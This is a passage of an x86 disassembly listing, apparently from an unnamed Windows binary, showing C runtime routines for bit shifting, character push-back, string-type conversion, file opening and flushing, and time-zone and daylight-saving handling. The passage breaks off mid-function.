sub_4332AF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_433380 proc near ; CODE XREF: sub_42E525+797�p
; sub_42E525+7E7�p
cmp cl, 40h
jnb short loc_43339A
cmp cl, 20h
jnb short loc_433390
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_433390: ; CODE XREF: sub_433380+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_43339A: ; CODE XREF: sub_433380+3�j
xor eax, eax
xor edx, edx
retn
sub_433380 endp
; =============== S U B R O U T I N E =======================================
sub_43339F proc near ; CODE XREF: sub_42EF9B+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_4333EB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_4333BD
test al, 80h
jz short loc_4333EB
test al, 2
jnz short loc_4333EB
loc_4333BD: ; CODE XREF: sub_43339F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_4333CA
push esi
call sub_433123
pop ecx
loc_4333CA: ; CODE XREF: sub_43339F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_4333DA
cmp dword ptr [esi+4], 0
jnz short loc_4333EB
inc eax
mov [esi], eax
loc_4333DA: ; CODE XREF: sub_43339F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_4333F1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_4333F7
inc eax
mov [esi], eax
loc_4333EB: ; CODE XREF: sub_43339F+9�j
; sub_43339F+18�j ...
or eax, 0FFFFFFFFh
loc_4333EE: ; CODE XREF: sub_43339F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4333F1: ; CODE XREF: sub_43339F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_4333F7: ; CODE XREF: sub_43339F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_4333EE
sub_43339F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43340D proc near ; CODE XREF: sub_42F05B+5E�p
; sub_43284B+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437D88
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_676B10
xor ebx, ebx
cmp eax, ebx
jnz short loc_43347C
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_437670
push esi
call dword_4371B4 ; GetStringTypeW
test eax, eax
jz short loc_43345A
mov eax, esi
jmp short loc_433477
; ---------------------------------------------------------------------------
loc_43345A: ; CODE XREF: sub_43340D+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset word_454018
push esi
push ebx
call dword_4371B8 ; GetStringTypeA
test eax, eax
jz loc_433542
push 2
pop eax
loc_433477: ; CODE XREF: sub_43340D+4B�j
mov dword_676B10, eax
loc_43347C: ; CODE XREF: sub_43340D+2F�j
cmp eax, 2
jnz short loc_4334A5
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_43348D
mov eax, dword_676988
loc_43348D: ; CODE XREF: sub_43340D+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_4371B8 ; GetStringTypeA
jmp loc_433544
; ---------------------------------------------------------------------------
loc_4334A5: ; CODE XREF: sub_43340D+72�j
cmp eax, 1
jnz loc_433542
cmp [ebp+arg_10], ebx
jnz short loc_4334BB
mov eax, dword_676998
mov [ebp+arg_10], eax
loc_4334BB: ; CODE XREF: sub_43340D+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_437180 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_433542
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_429A90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_429690
add esp, 0Ch
jmp short loc_433511
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_433511: ; CODE XREF: sub_43340D+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_433542
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_437180 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_433542
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_4371B4 ; GetStringTypeW
jmp short loc_433544
; ---------------------------------------------------------------------------
loc_433542: ; CODE XREF: sub_43340D+61�j
; sub_43340D+9B�j ...
xor eax, eax
loc_433544: ; CODE XREF: sub_43340D+93�j
; sub_43340D+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_43340D endp
; =============== S U B R O U T I N E =======================================
sub_433556 proc near ; CODE XREF: sub_42F1DB+1E�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, dword_676FC0
push esi
push edi
jnb short loc_4335D7
mov eax, ebx
sar eax, 5
lea edi, ds:676EC0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
test byte ptr [eax+esi+4], 1
jz short loc_4335D7
push ebx
call sub_43234B
mov eax, [edi]
pop ecx
test byte ptr [eax+esi+4], 1
jz short loc_4335BE
push ebx
call sub_432309
pop ecx
push eax
call dword_4371B0 ; FlushFileBuffers
test eax, eax
jnz short loc_4335B1
call dword_43716C ; RtlGetLastWin32Error
mov esi, eax
jmp short loc_4335B3
; ---------------------------------------------------------------------------
loc_4335B1: ; CODE XREF: sub_433556+4F�j
xor esi, esi
loc_4335B3: ; CODE XREF: sub_433556+59�j
test esi, esi
jz short loc_4335CC
call sub_42F052
mov [eax], esi
loc_4335BE: ; CODE XREF: sub_433556+3D�j
call sub_42F049
mov dword ptr [eax], 9
or esi, 0FFFFFFFFh
loc_4335CC: ; CODE XREF: sub_433556+5F�j
push ebx
call sub_4323AA
pop ecx
mov eax, esi
jmp short loc_4335E5
; ---------------------------------------------------------------------------
loc_4335D7: ; CODE XREF: sub_433556+D�j
; sub_433556+2D�j
call sub_42F049
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_4335E5: ; CODE XREF: sub_433556+7F�j
pop edi
pop esi
pop ebx
retn
sub_433556 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4335E9 proc near ; CODE XREF: sub_42F8C0+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_43360F
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_43361A
; ---------------------------------------------------------------------------
loc_43360F: ; CODE XREF: sub_4335E9+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_43361A: ; CODE XREF: sub_4335E9+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_433634
test ch, 40h
jnz short loc_433630
cmp dword_676C44, eax
jz short loc_433634
loc_433630: ; CODE XREF: sub_4335E9+3D�j
or [ebp+var_1], 80h
loc_433634: ; CODE XREF: sub_4335E9+38�j
; sub_4335E9+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_43365B
dec eax
jz short loc_433652
dec eax
jnz loc_4336ED
mov [ebp+var_C], 0C0000000h
jmp short loc_433662
; ---------------------------------------------------------------------------
loc_433652: ; CODE XREF: sub_4335E9+57�j
mov [ebp+var_C], 40000000h
jmp short loc_433662
; ---------------------------------------------------------------------------
loc_43365B: ; CODE XREF: sub_4335E9+54�j
mov [ebp+var_C], 80000000h
loc_433662: ; CODE XREF: sub_4335E9+67�j
; sub_4335E9+70�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_433690
cmp eax, 20h
jz short loc_433687
cmp eax, 30h
jz short loc_43367E
cmp eax, 40h
jnz short loc_4336ED
mov [ebp+var_10], esi
jmp short loc_433693
; ---------------------------------------------------------------------------
loc_43367E: ; CODE XREF: sub_4335E9+89�j
mov [ebp+var_10], 2
jmp short loc_433693
; ---------------------------------------------------------------------------
loc_433687: ; CODE XREF: sub_4335E9+84�j
mov [ebp+var_10], 1
jmp short loc_433693
; ---------------------------------------------------------------------------
loc_433690: ; CODE XREF: sub_4335E9+7F�j
mov [ebp+var_10], ebx
loc_433693: ; CODE XREF: sub_4335E9+93�j
; sub_4335E9+9C�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_4336D9
jz short loc_4336D4
cmp ecx, ebx
jz short loc_4336D4
cmp ecx, edi
jz short loc_4336CB
cmp ecx, 200h
jz short loc_433707
cmp ecx, 300h
jnz short loc_4336ED
mov [ebp+var_8], 2
jmp short loc_433717
; ---------------------------------------------------------------------------
loc_4336CB: ; CODE XREF: sub_4335E9+C7�j
mov [ebp+var_8], 4
jmp short loc_433717
; ---------------------------------------------------------------------------
loc_4336D4: ; CODE XREF: sub_4335E9+BF�j
; sub_4335E9+C3�j
mov [ebp+var_8], esi
jmp short loc_433717
; ---------------------------------------------------------------------------
loc_4336D9: ; CODE XREF: sub_4335E9+BD�j
cmp ecx, 500h
jz short loc_433710
cmp ecx, 600h
jz short loc_433707
cmp ecx, edx
jz short loc_433710
loc_4336ED: ; CODE XREF: sub_4335E9+5A�j
; sub_4335E9+8E�j ...
call sub_42F049
mov dword ptr [eax], 16h
call sub_42F052
mov [eax], ebx
or eax, 0FFFFFFFFh
jmp loc_4338B3
; ---------------------------------------------------------------------------
loc_433707: ; CODE XREF: sub_4335E9+CF�j
; sub_4335E9+FE�j
mov [ebp+var_8], 5
jmp short loc_433717
; ---------------------------------------------------------------------------
loc_433710: ; CODE XREF: sub_4335E9+F6�j
; sub_4335E9+102�j
mov [ebp+var_8], 1
loc_433717: ; CODE XREF: sub_4335E9+E0�j
; sub_4335E9+E9�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_433736
mov ecx, dword_6769AC
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_433736
push 1
pop esi
loc_433736: ; CODE XREF: sub_4335E9+138�j
; sub_4335E9+148�j
test al, 40h
jz short loc_433744
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_433744: ; CODE XREF: sub_4335E9+14F�j
test ah, 10h
jz short loc_43374B
or esi, edi
loc_43374B: ; CODE XREF: sub_4335E9+15E�j
test al, 20h
jz short loc_433757
or esi, 8000000h
jmp short loc_433761
; ---------------------------------------------------------------------------
loc_433757: ; CODE XREF: sub_4335E9+164�j
test al, 10h
jz short loc_433761
or esi, 10000000h
loc_433761: ; CODE XREF: sub_4335E9+16C�j
; sub_4335E9+170�j
call sub_4320EB
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_433789
call sub_42F049
mov dword ptr [eax], 18h
call sub_42F052
and dword ptr [eax], 0
mov eax, edi
jmp loc_4338B3
; ---------------------------------------------------------------------------
loc_433789: ; CODE XREF: sub_4335E9+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword_43705C ; CreateFileA
mov esi, eax
cmp esi, edi
jnz short loc_4337BC
loc_4337A8: ; CODE XREF: sub_4335E9+1E5�j
call dword_43716C ; RtlGetLastWin32Error
push eax
call sub_42EFD6
pop ecx
mov esi, edi
jmp loc_4338AA
; ---------------------------------------------------------------------------
loc_4337BC: ; CODE XREF: sub_4335E9+1BD�j
push esi
call dword_4371F0 ; GetFileType
test eax, eax
jnz short loc_4337D0
push esi
call dword_437044 ; CloseHandle
jmp short loc_4337A8
; ---------------------------------------------------------------------------
loc_4337D0: ; CODE XREF: sub_4335E9+1DC�j
cmp eax, 2
jnz short loc_4337DB
or [ebp+var_1], 40h
jmp short loc_4337E4
; ---------------------------------------------------------------------------
loc_4337DB: ; CODE XREF: sub_4335E9+1EA�j
cmp eax, 3
jnz short loc_4337E4
or [ebp+var_1], 8
loc_4337E4: ; CODE XREF: sub_4335E9+1F0�j
; sub_4335E9+1F5�j
push esi
push ebx
call sub_43220E
mov eax, ebx
pop ecx
sar eax, 5
pop ecx
mov cl, [ebp+var_1]
lea edi, ds:676EC0h[eax*4]
mov eax, ebx
or cl, 1
and eax, 1Fh
mov byte ptr [ebp+arg_0+3], cl
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
and byte ptr [ebp+arg_0+3], 48h
mov [eax+esi+4], cl
jnz short loc_433891
test cl, 80h
jz short loc_433891
test byte ptr [ebp+arg_4], 2
jz short loc_433891
push 2
push 0FFFFFFFFh
push ebx
call sub_42F84D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_433852
call sub_42F052
cmp dword ptr [eax], 83h
jz short loc_433891
loc_433846: ; CODE XREF: sub_4335E9+294�j
; sub_4335E9+2A6�j
push ebx
call sub_42F0D0
pop ecx
or esi, 0FFFFFFFFh
jmp short loc_4338AA
; ---------------------------------------------------------------------------
loc_433852: ; CODE XREF: sub_4335E9+24E�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_42F453
add esp, 0Ch
test eax, eax
jnz short loc_43387F
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_43387F
push [ebp+var_10]
push ebx
call sub_434D29
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_433846
loc_43387F: ; CODE XREF: sub_4335E9+27E�j
; sub_4335E9+284�j
push 0
push 0
push ebx
call sub_42F84D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_433846
loc_433891: ; CODE XREF: sub_4335E9+22E�j
; sub_4335E9+233�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4338A8
test byte ptr [ebp+arg_4], 8
jz short loc_4338A8
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_4338A8: ; CODE XREF: sub_4335E9+2AC�j
; sub_4335E9+2B2�j
mov esi, ebx
loc_4338AA: ; CODE XREF: sub_4335E9+1CE�j
; sub_4335E9+267�j
push ebx
call sub_4323AA
pop ecx
mov eax, esi
loc_4338B3: ; CODE XREF: sub_4335E9+119�j
; sub_4335E9+19B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4335E9 endp
; =============== S U B R O U T I N E =======================================
sub_4338B8 proc near ; CODE XREF: sub_4300AE+52�p
; DATA XREF: sub_420CC8+7�o
xor eax, eax
retn
sub_4338B8 endp
; =============== S U B R O U T I N E =======================================
sub_4338BB proc near ; CODE XREF: sub_43039C:loc_4303DB�p
cmp dword_676BD0, 0
jnz short locret_4338E8
push 0Bh
call sub_42DA1F
cmp dword_676BD0, 0
pop ecx
jnz short loc_4338E0
call sub_4338E9
inc dword_676BD0
loc_4338E0: ; CODE XREF: sub_4338BB+18�j
push 0Bh
call sub_42DA80
pop ecx
locret_4338E8: ; CODE XREF: sub_4338BB+7�j
retn
sub_4338BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4338E9 proc near ; CODE XREF: sub_4338BB+1A�p
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
push 0Ch
pop edi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call sub_42DA1F
or dword_453BA8, 0FFFFFFFFh
or dword_453B98, 0FFFFFFFFh
mov dword_676B18, ebx
mov [esp+18h+var_18], offset aTz ; "TZ"
call sub_431213
mov esi, eax
pop ecx
cmp esi, ebx
jnz loc_433A27
push edi
call sub_42DA80
mov [esp+18h+var_18], offset dword_676B20
call dword_437214 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz loc_433B6B
mov eax, dword_676B20
mov ecx, dword_676B74
imul eax, 3Ch
cmp word_676B66, bx
push 1
pop edx
mov dword_453B04, eax
mov dword_676B18, edx
jz short loc_433977
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_453B04, eax
loc_433977: ; CODE XREF: sub_4338E9+80�j
cmp word_676BBA, bx
jz short loc_43399B
mov eax, dword_676BC8
cmp eax, ebx
jz short loc_43399B
sub eax, ecx
mov dword_453B08, edx
imul eax, 3Ch
mov dword_453B0C, eax
jmp short loc_4339A7
; ---------------------------------------------------------------------------
loc_43399B: ; CODE XREF: sub_4338E9+95�j
; sub_4338E9+9E�j
mov dword_453B08, ebx
mov dword_453B0C, ebx
loc_4339A7: ; CODE XREF: sub_4338E9+B0�j
lea eax, [ebp+var_4]
mov esi, dword_437074
push eax
push ebx
push 3Fh
mov edi, 220h
push off_453B90
push 0FFFFFFFFh
push offset dword_676B24
push edi
push dword_676998
call esi ; dword_437074
test eax, eax
jz short loc_4339E3
cmp [ebp+var_4], ebx
jnz short loc_4339E3
mov eax, off_453B90
and byte ptr [eax+3Fh], 0
jmp short loc_4339EB
; ---------------------------------------------------------------------------
loc_4339E3: ; CODE XREF: sub_4338E9+E8�j
; sub_4338E9+ED�j
mov eax, off_453B90
and byte ptr [eax], 0
loc_4339EB: ; CODE XREF: sub_4338E9+F8�j
lea eax, [ebp+var_4]
push eax
push ebx
push 3Fh
push off_453B94
push 0FFFFFFFFh
push offset dword_676B78
push edi
push dword_676998
call esi ; dword_437074
test eax, eax
jz loc_433B5A
cmp [ebp+var_4], ebx
jnz loc_433B5A
mov eax, off_453B94
and byte ptr [eax+3Fh], 0
jmp loc_433B6B
; ---------------------------------------------------------------------------
loc_433A27: ; CODE XREF: sub_4338E9+3B�j
cmp byte ptr [esi], 0
jz loc_433B64
mov eax, dword_676BCC
cmp eax, ebx
jz short loc_433A4A
push eax
push esi
call sub_42B190
pop ecx
test eax, eax
pop ecx
jz loc_433B64
loc_433A4A: ; CODE XREF: sub_4338E9+14E�j
push dword_676BCC
call sub_429822
push esi
call sub_4292D0
inc eax
push eax
call sub_4296E8
add esp, 0Ch
cmp eax, ebx
mov dword_676BCC, eax
jz loc_433B64
push esi
push eax
call sub_42A500
push edi
call sub_42DA80
push 3
push esi
push off_453B90
call sub_429C40
mov eax, off_453B90
add esi, 3
add esp, 18h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_433AA9
mov [ebp+var_8], 1
inc esi
loc_433AA9: ; CODE XREF: sub_4338E9+1B6�j
push esi
call sub_429FA5
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_453B04, ecx
loc_433AC0: ; CODE XREF: sub_4338E9+1E6�j
mov al, [esi]
cmp al, 2Bh
jz short loc_433ACE
cmp al, bl
jl short loc_433AD1
cmp al, 39h
jg short loc_433AD1
loc_433ACE: ; CODE XREF: sub_4338E9+1DB�j
inc esi
jmp short loc_433AC0
; ---------------------------------------------------------------------------
loc_433AD1: ; CODE XREF: sub_4338E9+1DF�j
; sub_4338E9+1E3�j
cmp byte ptr [esi], 3Ah
jnz short loc_433B24
inc esi
push esi
call sub_429FA5
imul eax, 3Ch
pop ecx
mov ecx, dword_453B04
add ecx, eax
mov dword_453B04, ecx
loc_433AEF: ; CODE XREF: sub_4338E9+211�j
mov al, [esi]
cmp al, bl
jl short loc_433AFC
cmp al, 39h
jg short loc_433AFC
inc esi
jmp short loc_433AEF
; ---------------------------------------------------------------------------
loc_433AFC: ; CODE XREF: sub_4338E9+20A�j
; sub_4338E9+20E�j
cmp byte ptr [esi], 3Ah
jnz short loc_433B24
inc esi
push esi
call sub_429FA5
pop ecx
mov ecx, dword_453B04
add ecx, eax
mov dword_453B04, ecx
loc_433B17: ; CODE XREF: sub_4338E9+239�j
mov al, [esi]
cmp al, bl
jl short loc_433B24
cmp al, 39h
jg short loc_433B24
inc esi
jmp short loc_433B17
; ---------------------------------------------------------------------------
loc_433B24: ; CODE XREF: sub_4338E9+1EB�j
; sub_4338E9+216�j ...
cmp [ebp+var_8], 0
jz short loc_433B32
neg ecx
mov dword_453B04, ecx
loc_433B32: ; CODE XREF: sub_4338E9+23F�j
movsx eax, byte ptr [esi]
test eax, eax
mov dword_453B08, eax
jz short loc_433B5A
push 3
push esi
push off_453B94
call sub_429C40
mov eax, off_453B94
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_433B6B
; ---------------------------------------------------------------------------
loc_433B5A: ; CODE XREF: sub_4338E9+121�j
; sub_4338E9+12A�j ...
mov eax, off_453B94
and byte ptr [eax], 0
jmp short loc_433B6B
; ---------------------------------------------------------------------------
loc_433B64: ; CODE XREF: sub_4338E9+141�j
; sub_4338E9+15B�j ...
push edi
call sub_42DA80
pop ecx
loc_433B6B: ; CODE XREF: sub_4338E9+57�j
; sub_4338E9+139�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4338E9 endp
; =============== S U B R O U T I N E =======================================
sub_433B70 proc near ; CODE XREF: sub_43039C+A5�p
arg_0 = dword ptr 4
push esi
push 0Bh
call sub_42DA1F
push [esp+8+arg_0]
call sub_433B91
push 0Bh
mov esi, eax
call sub_42DA80
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_433B70 endp
; =============== S U B R O U T I N E =======================================
sub_433B91 proc near ; CODE XREF: sub_433B70+C�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_453B08, edi
jnz short loc_433BA5
loc_433B9E: ; CODE XREF: sub_433B91+148�j
; sub_433B91+150�j ...
xor eax, eax
jmp loc_433CF1
; ---------------------------------------------------------------------------
loc_433BA5: ; CODE XREF: sub_433B91+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_453B98
jnz short loc_433BC3
cmp eax, dword_453BA8
jz loc_433CC5
loc_433BC3: ; CODE XREF: sub_433B91+24�j
cmp dword_676B18, edi
jz loc_433C9B
movzx ecx, word_676BC6
push ecx
cmp word_676BB8, di
movzx ecx, word_676BC4
push ecx
movzx ecx, word_676BC2
push ecx
movzx ecx, word_676BC0
push ecx
jnz short loc_433C15
movzx ecx, word_676BBC
push edi
push ecx
movzx ecx, word_676BBE
push ecx
movzx ecx, word_676BBA
push ecx
push eax
push ebx
jmp short loc_433C29
; ---------------------------------------------------------------------------
loc_433C15: ; CODE XREF: sub_433B91+65�j
movzx ecx, word_676BBE
push ecx
push edi
movzx ecx, word_676BBA
push edi
push ecx
push eax
push edi
loc_433C29: ; CODE XREF: sub_433B91+82�j
push ebx
call sub_433D3D
movzx eax, word_676B72
add esp, 2Ch
cmp word_676B64, di
push eax
movzx eax, word_676B70
push eax
movzx eax, word_676B6E
push eax
movzx eax, word_676B6C
push eax
jnz short loc_433C83
movzx eax, word_676B68
push edi
push eax
movzx eax, word_676B6A
push eax
movzx eax, word_676B66
push eax
push dword ptr [esi+14h]
push ebx
loc_433C78: ; CODE XREF: sub_433B91+108�j
push edi
call sub_433D3D
add esp, 2Ch
jmp short loc_433CC5
; ---------------------------------------------------------------------------
loc_433C83: ; CODE XREF: sub_433B91+C8�j
movzx eax, word_676B6A
push eax
push edi
movzx eax, word_676B66
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_433C78
; ---------------------------------------------------------------------------
loc_433C9B: ; CODE XREF: sub_433B91+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_433D3D
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_433D3D
add esp, 58h
loc_433CC5: ; CODE XREF: sub_433B91+2C�j
; sub_433B91+F0�j
mov edx, dword_453B9C
mov eax, dword_453BAC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_433CF5
cmp ecx, edx
jl loc_433B9E
cmp ecx, eax
jg loc_433B9E
cmp ecx, edx
jle short loc_433D09
cmp ecx, eax
jge short loc_433D09
loc_433CEF: ; CODE XREF: sub_433B91+166�j
; sub_433B91+16A�j
mov eax, ebx
loc_433CF1: ; CODE XREF: sub_433B91+F�j
; sub_433B91+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_433CF5: ; CODE XREF: sub_433B91+144�j
cmp ecx, eax
jl short loc_433CEF
cmp ecx, edx
jg short loc_433CEF
cmp ecx, eax
jle short loc_433D09
cmp ecx, edx
jl loc_433B9E
loc_433D09: ; CODE XREF: sub_433B91+158�j
; sub_433B91+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_433D30
xor ecx, ecx
cmp eax, dword_453BA0
setnl cl
loc_433D2C: ; CODE XREF: sub_433B91+1AA�j
mov eax, ecx
jmp short loc_433CF1
; ---------------------------------------------------------------------------
loc_433D30: ; CODE XREF: sub_433B91+18E�j
xor ecx, ecx
cmp eax, dword_453BB0
setl cl
jmp short loc_433D2C
sub_433B91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433D3D proc near ; CODE XREF: sub_433B91+99�p
; sub_433B91+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_433DD8
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_433D68
shl esi, 2
mov eax, dword_453BB0[esi]
jmp short loc_433D71
; ---------------------------------------------------------------------------
loc_433D68: ; CODE XREF: sub_433D3D+1E�j
shl esi, 2
mov eax, dword_453BE4[esi]
loc_433D71: ; CODE XREF: sub_433D3D+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_433DAB
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_433DB5
; ---------------------------------------------------------------------------
loc_433DAB: ; CODE XREF: sub_433D3D+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_433DB5: ; CODE XREF: sub_433D3D+6C�j
cmp [ebp+arg_10], 5
jnz short loc_433DF3
cmp [ebp+arg_8], 0
jnz short loc_433DC9
mov esi, dword_453BB4[esi]
jmp short loc_433DCF
; ---------------------------------------------------------------------------
loc_433DC9: ; CODE XREF: sub_433D3D+82�j
mov esi, dword_453BE8[esi]
loc_433DCF: ; CODE XREF: sub_433D3D+8A�j
cmp ecx, esi
jle short loc_433DF3
sub ecx, 7
jmp short loc_433DF3
; ---------------------------------------------------------------------------
loc_433DD8: ; CODE XREF: sub_433D3D+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_433DE9
mov ecx, dword_453BB0[eax*4]
jmp short loc_433DF0
; ---------------------------------------------------------------------------
loc_433DE9: ; CODE XREF: sub_433D3D+A1�j
mov ecx, dword_453BE4[eax*4]
loc_433DF0: ; CODE XREF: sub_433D3D+AA�j
add ecx, [ebp+arg_18]
loc_433DF3: ; CODE XREF: sub_433D3D+7C�j
; sub_433D3D+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_433E24
mov eax, [ebp+arg_1C]
mov dword_453B9C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_453B98, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_453BA0, eax
jmp short loc_433E79
; ---------------------------------------------------------------------------
loc_433E24: ; CODE XREF: sub_433D3D+BA�j
mov eax, [ebp+arg_1C]
mov dword_453BAC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_453B0C
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
